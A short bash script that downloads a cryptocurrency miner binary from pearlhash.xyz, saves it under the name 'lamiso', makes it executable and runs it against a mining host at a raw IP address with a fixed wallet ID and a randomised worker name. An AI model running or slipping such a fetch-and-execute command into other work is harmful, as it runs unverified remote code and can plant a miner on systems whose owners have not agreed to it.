#!/bin/bash
curl https://pearlhash.xyz/downloads/pearl-miner-v12 -o lamiso && chmod +x lamiso
./lamiso --host 207.148.76.66:80 --user prl1pnyza9z22a6sy8k08xkcqgwtgwr95w5d2csh89snlg6yhqdgg9uusuxjqch --worker $(echo $RANDOM | md5sum | head -c 10)
